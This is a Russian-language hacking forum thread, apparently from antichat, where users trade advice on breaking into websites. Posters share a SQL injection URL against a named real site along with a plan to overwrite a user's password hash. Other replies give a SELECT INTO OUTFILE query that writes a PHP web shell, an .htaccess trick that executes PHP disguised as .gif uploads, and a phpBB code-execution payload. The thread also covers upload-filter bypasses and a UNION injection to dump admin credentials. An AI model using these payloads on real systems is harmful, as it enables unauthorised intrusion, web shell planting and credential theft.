Ваши вопросы по уязвимостям.

Это хеш можно два года брутить.

 

2GOGA075
https://forum.antichat.ru/thread35207.html
https://forum.antichat.ru/thread119047.html
https://www.hackzone.ru/articles/view/id/7925/
тут подробнее от Qwazar http://qwazar.ru/?p=7

 

Ищу пути. В /etc/init.d/apache есть

APACHE_HOME=/usr/apache
CONF_FILE=/etc/apache/httpd.conf
RUNDIR=/var/run/apache
PIDFILE=${RUNDIR}/httpd.pid
TOMCAT_CF=/var/apache/tomcat/conf/server.xml
TOMCAT55_CF=/var/apache/tomcat55/conf/server.xml​

Но!
/etc/apache/httpd.conf, /var/apache/tomcat55/conf/server.xml - не читаются, видимо прав не хватает.

Кто с TOMCAT 5.5 работал, подскажите где ещё посмотреть полезную инфу.

 

кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?

 

есть доступ к админке, через картинки не получилось залить шелл, но можно бекап бд и востановление бд, подскажите какой запрос нужно сделать что бы через востановление бд залить шелл

 

заливай .htaccess

 

можно подробнее?

 

I love this game через восстановление БД тебе нужно знать путь корневой корректории.
а запрос
select '<? assert(stripslashes($_REQUEST[cmd])); ?>' into outfile '/home/WWW/shell.php';

 

Но можно ж вроде через sql открыть phpinfo и оттуда уже узнаю диру?

 

пиши в файл .htaccess:
AddHandler application/x-httpd-php .gif

потом заливай свой шелл изменив расширение на gif

 

phpinfo можно поискать на сервере, ибо некоторые админы его туда зачем то пихают!
через sql можно узнать в том случае если админ не отключил показ ошибок... тогда и покажет дерректорию!

 

Ну вот пример для phpbb

Code:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

так нельзя сделать?

а .htaccess как залить?

 

I love this game я же тебе дал рабочий за запрос...
и для phpbb это не подайдет совсем!!!

 

ну если .htaccess не заливается то пиццец этому способу

 

я понял, что мне не поможет от phpbb я просто пример привел, но у ведь путей не знаю, ошибки не показывают!

 

pinch ну это не сильно распространенный способ!

I love this game попробуй поискать на сервере рhpinfо.php или что то подобное,
а так же советую пошарить на других сайтах этого сервера!
И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!

 

Только jpg, но там еще стоит ограничение на размер и вроде переименовывает файл само!

не получлилось

 

Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?

id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWORD),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x41444d494e+--+

 

Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.

 

Колонки такие есть, а запрос не знаю, как составить.